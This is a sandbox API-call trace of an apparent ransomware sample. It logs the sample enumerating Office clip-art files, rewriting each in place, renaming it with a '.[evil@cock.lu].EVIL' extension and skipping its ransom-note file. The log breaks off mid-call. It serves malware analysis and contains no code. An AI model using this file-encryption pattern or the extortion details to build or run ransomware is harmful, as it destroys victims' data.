[0127.064] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF", dwFileAttributes=0x200) returned 0 [0127.064] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.064] wcsstr (_Str="HH02298_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.065] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 69 [0127.065] wcscmp (_String1="HH02298_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.065] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH02298_.WMF") returned 0x0 [0127.065] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 0x45 [0127.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.067] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15b0, lpOverlapped=0x0) returned 1 [0127.081] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.081] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.081] _errno () returned 0x84b1160840 [0127.082] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.082] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15c0, lpOverlapped=0x0) returned 1 [0127.082] CloseHandle (hObject=0x1a8) returned 1 [0127.082] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.082] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.082] __uncaught_exception () returned 0x84b1160800 [0127.082] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.083] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf.[evil@cock.lu].evil")) returned 1 [0127.083] ??_V@YAXPEAX@Z () returned 0x1 [0127.087] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF", dwFileAttributes=0x200) returned 0 [0127.087] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.087] wcsstr (_Str="HH02312_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.087] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 69 [0127.087] wcscmp (_String1="HH02312_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.087] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH02312_.WMF") returned 0x0 [0127.087] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 0x45 [0127.087] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.089] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x136a, lpOverlapped=0x0) returned 1 [0127.103] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.103] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.103] _errno () returned 0x84b1160840 [0127.103] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.103] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0127.104] CloseHandle (hObject=0x1a8) returned 1 [0127.104] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.104] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.104] __uncaught_exception () returned 0x84b1160800 [0127.104] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.104] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02312_.wmf.[evil@cock.lu].evil")) returned 1 [0127.105] ??_V@YAXPEAX@Z () returned 0x1 [0127.110] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF", dwFileAttributes=0x200) returned 0 [0127.110] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.111] wcsstr (_Str="HH02313_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.111] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 69 [0127.111] wcscmp (_String1="HH02313_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.111] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH02313_.WMF") returned 0x0 [0127.111] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 0x45 [0127.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.113] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc0a, lpOverlapped=0x0) returned 1 [0127.121] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.121] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.121] _errno () returned 0x84b1160840 [0127.121] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.122] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc20, lpOverlapped=0x0) returned 1 [0127.122] CloseHandle (hObject=0x1a8) returned 1 [0127.122] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.122] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.122] __uncaught_exception () returned 0x84b1160800 [0127.122] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.123] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf.[evil@cock.lu].evil")) returned 1 [0127.123] ??_V@YAXPEAX@Z () returned 0x1 [0127.127] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF", dwFileAttributes=0x200) returned 0 [0127.127] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.127] wcsstr (_Str="HM00005_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 69 [0127.127] wcscmp (_String1="HM00005_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HM00005_.WMF") returned 0x0 [0127.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF") returned 0x45 [0127.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.132] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b04, lpOverlapped=0x0) returned 1 [0127.135] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.136] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.136] _errno () returned 0x84b1160840 [0127.136] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.136] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x5b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5b20, lpOverlapped=0x0) returned 1 [0127.136] CloseHandle (hObject=0x1a8) returned 1 [0127.136] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.136] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.136] __uncaught_exception () returned 0x84b1160800 [0127.136] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.137] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00005_.wmf.[evil@cock.lu].evil")) returned 1 [0127.138] ??_V@YAXPEAX@Z () returned 0x1 [0127.141] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF", dwFileAttributes=0x200) returned 0 [0127.141] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.141] wcsstr (_Str="HM00114_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.141] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 69 [0127.141] wcscmp (_String1="HM00114_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.141] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HM00114_.WMF") returned 0x0 [0127.141] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 0x45 [0127.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.144] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5664, lpOverlapped=0x0) returned 1 [0127.149] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.149] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.149] _errno () returned 0x84b1160840 [0127.149] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.149] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x5680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5680, lpOverlapped=0x0) returned 1 [0127.149] CloseHandle (hObject=0x1a8) returned 1 [0127.150] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.150] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.150] __uncaught_exception () returned 0x84b1160800 [0127.150] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.150] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf.[evil@cock.lu].evil")) returned 1 [0127.151] ??_V@YAXPEAX@Z () returned 0x1 [0127.154] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF", dwFileAttributes=0x200) returned 0 [0127.154] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.154] wcsstr (_Str="HM00116_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.154] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 69 [0127.155] wcscmp (_String1="HM00116_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.155] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HM00116_.WMF") returned 0x0 [0127.155] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 0x45 [0127.155] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.158] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3dec, lpOverlapped=0x0) returned 1 [0127.171] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.171] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.171] _errno () returned 0x84b1160840 [0127.172] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.172] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3e00, lpOverlapped=0x0) returned 1 [0127.172] CloseHandle (hObject=0x1a8) returned 1 [0127.172] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.172] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.172] __uncaught_exception () returned 0x84b1160800 [0127.172] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.173] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf.[evil@cock.lu].evil")) returned 1 [0127.173] ??_V@YAXPEAX@Z () returned 0x1 [0127.177] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF", dwFileAttributes=0x200) returned 0 [0127.177] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.177] wcsstr (_Str="HM00172_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.177] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 69 [0127.177] wcscmp (_String1="HM00172_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.177] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HM00172_.WMF") returned 0x0 [0127.177] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 0x45 [0127.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.180] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb10, lpOverlapped=0x0) returned 1 [0127.193] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.193] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.193] _errno () returned 0x84b1160840 [0127.193] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.193] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb20, lpOverlapped=0x0) returned 1 [0127.194] CloseHandle (hObject=0x1a8) returned 1 [0127.194] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.194] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.194] __uncaught_exception () returned 0x84b1160800 [0127.194] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.194] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf.[evil@cock.lu].evil")) returned 1 [0127.195] ??_V@YAXPEAX@Z () returned 0x1 [0127.198] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF", dwFileAttributes=0x200) returned 0 [0127.199] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.199] wcsstr (_Str="HM00426_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.199] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 69 [0127.199] wcscmp (_String1="HM00426_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.199] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HM00426_.WMF") returned 0x0 [0127.199] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 0x45 [0127.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.201] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10ca8, lpOverlapped=0x0) returned 1 [0127.224] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.224] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.224] _errno () returned 0x84b1160840 [0127.224] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.224] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x10cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10cc0, lpOverlapped=0x0) returned 1 [0127.224] CloseHandle (hObject=0x1a8) returned 1 [0127.225] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.225] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.225] __uncaught_exception () returned 0x84b1160800 [0127.225] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.225] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf.[evil@cock.lu].evil")) returned 1 [0127.226] ??_V@YAXPEAX@Z () returned 0x1 [0127.231] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF", dwFileAttributes=0x200) returned 0 [0127.232] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.232] wcsstr (_Str="HTECH_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.232] _snwprintf (in: 